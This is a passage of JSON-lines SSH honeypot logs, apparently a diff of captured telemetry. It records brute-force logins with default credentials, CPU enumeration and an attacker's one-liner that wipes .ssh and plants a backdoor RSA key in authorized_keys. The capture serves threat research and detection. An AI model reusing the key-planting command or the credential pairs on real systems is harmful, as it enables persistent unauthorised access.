{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "209.38.229.174", "src_port": "59494", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:01:26.430824"}
|
| 49 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "59494", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:01:26.431810"}
|
| 50 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 221.159.44.18:62527 (64.31.55.123:22) [session: c5a946c839cb]", "src_host": "221.159.44.18", "src_port": "62527", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:01:30.065392"}
|
| 51 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: 9d31b8e6c87f893d077ca6526f7c710b", "src_host": "221.159.44.18", "src_port": "62527", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:01:30.343792"}
|
| 52 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'hikvision'/b'hikvision'] failed", "src_host": "221.159.44.18", "src_port": "62527", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:01:31.960541"}
|
| 53 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'hikvision'/b'12345'] failed", "src_host": "221.159.44.18", "src_port": "62527", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:01:33.250615"}
|
| 54 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'hikvision'/b''] failed", "src_host": "221.159.44.18", "src_port": "62527", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:01:34.601477"}
|
| 55 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "221.159.44.18", "src_port": "62527", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:01:35.744337"}
|
| 56 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 43.156.90.187:49620 (64.31.55.123:22) [session: be58de1f4d49]", "src_host": "43.156.90.187", "src_port": "49620", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:01:45.512091"}
|
| 57 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "43.156.90.187", "src_port": "49620", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:01:45.689746"}
|
| 58 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'bot10'/b'123456'] succeeded", "src_host": "43.156.90.187", "src_port": "49620", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:01:46.483151"}
|
| 59 |
+
{"info": "command.input", "alert": "Execution", "tshark": "INPUT_COMD: cd ~; chattr -ia .ssh; lockr -ia .ssh", "src_host": "43.156.90.187", "src_port": 49620, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:01:47.595986"}
|
| 60 |
+
{"info": "command.input", "alert": "Execution", "tshark": "OUTPUT: chattr: command not found\nlockr: command not found\nroot@ubuntu:~# ", "src_host": "43.156.90.187", "src_port": 49620, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:02:04.008223"}
|
| 61 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 43.156.90.187:41552 (64.31.55.123:22) [session: f550cc88849e]", "src_host": "43.156.90.187", "src_port": "41552", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:02:04.011389"}
|
| 62 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "43.156.90.187", "src_port": "41552", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:02:04.188456"}
|
| 63 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 198.235.24.54:52845 (64.31.55.123:22) [session: 0035b65c4f90]", "src_host": "198.235.24.54", "src_port": "52845", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:02:04.506454"}
|
| 64 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "198.235.24.54", "src_port": "52845", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:02:04.680177"}
|
| 65 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'345gs5662d34'/b'345gs5662d34'] failed", "src_host": "43.156.90.187", "src_port": "41552", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:02:04.946074"}
|
| 66 |
+
{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "43.156.90.187", "src_port": "41552", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:02:06.125166"}
|
| 67 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "43.156.90.187", "src_port": "41552", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:02:06.126052"}
|
| 68 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 43.156.90.187:42590 (64.31.55.123:22) [session: 9056a41f5d6f]", "src_host": "43.156.90.187", "src_port": "42590", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:02:06.301274"}
|
| 69 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "43.156.90.187", "src_port": "42590", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:02:06.478528"}
|
| 70 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'bot10'/b'3245gs5662d34'] failed", "src_host": "43.156.90.187", "src_port": "49620", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:02:07.276799"}
|
| 71 |
+
{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "43.156.90.187", "src_port": "42590", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:02:08.456061"}
|
| 72 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "43.156.90.187", "src_port": "42590", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:02:08.456771"}
|
| 73 |
+
{"info": "command.input", "alert": "Execution", "tshark": "INPUT_COMD: cat /proc/cpuinfo | grep name | wc -l", "src_host": "43.156.90.187", "src_port": 49620, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:02:09.517774"}
|
| 74 |
+
{"info": "command.input", "alert": "Execution", "tshark": "OUTPUT: ERRORnot enough values to unpack (expected 3, got 1)", "src_host": "43.156.90.187", "src_port": 49620, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:02:09.518197"}
|
| 75 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "43.156.90.187", "src_port": "49620", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:02:09.696059"}
|
| 76 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:50344 (64.31.55.123:22) [session: 527dcfc4cee9]", "src_host": "209.38.229.174", "src_port": "50344", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:02:22.228787"}
|
| 77 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "209.38.229.174", "src_port": "50344", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:02:22.373335"}
|
| 78 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'ziyou'/b'ziyou'] failed", "src_host": "209.38.229.174", "src_port": "50344", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:02:23.038165"}
|
| 79 |
+
{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "209.38.229.174", "src_port": "50344", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:02:24.183869"}
|
| 80 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "50344", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:02:24.184954"}
|
| 81 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 43.156.90.187:49536 (64.31.55.123:22) [session: 2abd847680ee]", "src_host": "43.156.90.187", "src_port": "49536", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:03:14.869846"}
|
| 82 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "43.156.90.187", "src_port": "49536", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:03:15.046812"}
|
| 83 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'gedde'/b'123456'] succeeded", "src_host": "43.156.90.187", "src_port": "49536", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:03:15.842274"}
|
| 84 |
+
{"info": "command.input", "alert": "Execution", "tshark": "INPUT_COMD: cd ~; chattr -ia .ssh; lockr -ia .ssh", "src_host": "43.156.90.187", "src_port": 49536, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:03:17.024281"}
|
| 85 |
+
{"info": "command.input", "alert": "Execution", "tshark": "OUTPUT: chattr: command not found\nlockr: command not found\nroot@ubuntu:~# ", "src_host": "43.156.90.187", "src_port": 49536, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:03:28.776677"}
|
| 86 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:41190 (64.31.55.123:22) [session: 6e6030bfb1b7]", "src_host": "209.38.229.174", "src_port": "41190", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:03:28.781745"}
|
| 87 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "41190", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:03:28.783168"}
|
| 88 |
+
{"info": "command.input", "alert": "Execution", "tshark": "INPUT_COMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~", "src_host": "43.156.90.187", "src_port": 49536, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:03:29.911655"}
|
| 89 |
+
{"info": "command.input", "alert": "Execution", "tshark": "OUTPUT: root@ubuntu:~#", "src_host": "43.156.90.187", "src_port": 49536, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:03:29.912072"}
|
| 90 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 43.156.90.187:59086 (64.31.55.123:22) [session: de6ea810678d]", "src_host": "43.156.90.187", "src_port": "59086", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:03:30.265561"}
|
| 91 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "43.156.90.187", "src_port": "59086", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:03:30.442670"}
|
| 92 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'345gs5662d34'/b'345gs5662d34'] failed", "src_host": "43.156.90.187", "src_port": "49536", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:03:31.241491"}
|
| 93 |
+
{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "43.156.90.187", "src_port": "59086", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:03:32.420313"}
|
| 94 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "43.156.90.187", "src_port": "59086", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:03:32.421485"}
|
| 95 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 43.156.90.187:59102 (64.31.55.123:22) [session: 46188703e80d]", "src_host": "43.156.90.187", "src_port": "59102", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:03:32.596305"}
|
| 96 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "43.156.90.187", "src_port": "59102", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:03:32.773643"}
|
| 97 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'gedde'/b'3245gs5662d34'] failed", "src_host": "43.156.90.187", "src_port": "49536", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:03:33.572878"}
|
| 98 |
+
{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "43.156.90.187", "src_port": "59102", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:03:34.751795"}
|
| 99 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "43.156.90.187", "src_port": "59102", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:03:34.753430"}
|
| 100 |
+
{"info": "command.input", "alert": "Execution", "tshark": "INPUT_COMD: cat /proc/cpuinfo | grep name | wc -l", "src_host": "43.156.90.187", "src_port": 49536, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:03:35.652735"}
|
| 101 |
+
{"info": "command.input", "alert": "Execution", "tshark": "OUTPUT: ERRORnot enough values to unpack (expected 3, got 1)", "src_host": "43.156.90.187", "src_port": 49536, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:03:35.653528"}
|
| 102 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "43.156.90.187", "src_port": "49536", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:03:35.832449"}
|
| 103 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:60266 (64.31.55.123:22) [session: 459febf8ea8a]", "src_host": "209.38.229.174", "src_port": "60266", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:04:13.457758"}
|
| 104 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "209.38.229.174", "src_port": "60266", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:04:13.604912"}
|
| 105 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'Marjukka'/b'123456'] succeeded", "src_host": "209.38.229.174", "src_port": "60266", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:04:14.278177"}
|
| 106 |
+
{"info": "command.input", "alert": "Execution", "tshark": "INPUT_COMD: cd ~; chattr -ia .ssh; lockr -ia .ssh", "src_host": "209.38.229.174", "src_port": 60266, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:04:15.394961"}
|
| 107 |
+
{"info": "command.input", "alert": "Execution", "tshark": "OUTPUT: chattr: command not found\nlockr: command not found\nroot@ubuntu:~# ", "src_host": "209.38.229.174", "src_port": 60266, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:04:43.303108"}
|
| 108 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:39326 (64.31.55.123:22) [session: 9322a7be6260]", "src_host": "209.38.229.174", "src_port": "39326", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:04:43.306372"}
|
| 109 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:42688 (64.31.55.123:22) [session: 8537c446ebe6]", "src_host": "209.38.229.174", "src_port": "42688", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:04:43.307222"}
|
| 110 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "39326", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:04:43.308765"}
|
| 111 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "209.38.229.174", "src_port": "42688", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:04:43.454977"}
|
| 112 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 43.156.90.187:59520 (64.31.55.123:22) [session: 7417509b115c]", "src_host": "43.156.90.187", "src_port": "59520", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:04:43.696540"}
|
| 113 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "43.156.90.187", "src_port": "59520", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:04:43.873857"}
|
| 114 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'Marjukka'/b'3245gs5662d34'] failed", "src_host": "209.38.229.174", "src_port": "60266", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:04:44.094585"}
|
| 115 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'riffraff'/b'riffraff'] failed", "src_host": "43.156.90.187", "src_port": "60266", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:04:44.676244"}
|
| 116 |
+
{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "209.38.229.174", "src_port": "42688", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:04:45.244417"}
|
| 117 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "42688", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:04:45.245829"}
|
| 118 |
+
{"info": "command.input", "alert": "Execution", "tshark": "INPUT_COMD: cat /proc/cpuinfo | grep name | wc -l", "src_host": "209.38.229.174", "src_port": 60266, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:04:46.342995"}
|
| 119 |
+
{"info": "command.input", "alert": "Execution", "tshark": "OUTPUT: ERRORnot enough values to unpack (expected 3, got 1)", "src_host": "209.38.229.174", "src_port": 60266, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:04:46.343525"}
|
| 120 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "60266", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:04:46.491493"}
|
| 121 |
+
{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "43.156.90.187", "src_port": "59520", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:04:46.519594"}
|
| 122 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "43.156.90.187", "src_port": "59520", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:04:46.520490"}
|
| 123 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:51114 (64.31.55.123:22) [session: 243fd025e605]", "src_host": "209.38.229.174", "src_port": "51114", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:05:06.613122"}
|
| 124 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "209.38.229.174", "src_port": "51114", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:05:06.758150"}
|
| 125 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'mersinger'/b'123456'] succeeded", "src_host": "209.38.229.174", "src_port": "51114", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:05:07.435324"}
|
| 126 |
+
{"info": "command.input", "alert": "Execution", "tshark": "INPUT_COMD: cd ~; chattr -ia .ssh; lockr -ia .ssh", "src_host": "209.38.229.174", "src_port": 51114, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:05:08.397433"}
|
| 127 |
+
{"info": "command.input", "alert": "Execution", "tshark": "OUTPUT: chattr: command not found\nlockr: command not found\nroot@ubuntu:~# ", "src_host": "209.38.229.174", "src_port": 51114, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:05:36.692737"}
|
| 128 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:58014 (64.31.55.123:22) [session: 4083719ea8e0]", "src_host": "209.38.229.174", "src_port": "58014", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:05:36.697702"}
|
| 129 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:33102 (64.31.55.123:22) [session: 562fb033f102]", "src_host": "209.38.229.174", "src_port": "33102", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:05:36.698669"}
|
| 130 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "58014", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:05:36.701239"}
|
| 131 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "209.38.229.174", "src_port": "33102", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:05:36.843833"}
|
| 132 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'mersinger'/b'3245gs5662d34'] failed", "src_host": "209.38.229.174", "src_port": "33102", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:05:37.465464"}
|
| 133 |
+
{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "209.38.229.174", "src_port": "33102", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:05:38.611362"}
|
| 134 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "33102", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:05:38.612257"}
|
| 135 |
+
{"info": "command.input", "alert": "Execution", "tshark": "INPUT_COMD: cat /proc/cpuinfo | grep name | wc -l", "src_host": "209.38.229.174", "src_port": 51114, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:05:39.695718"}
|
| 136 |
+
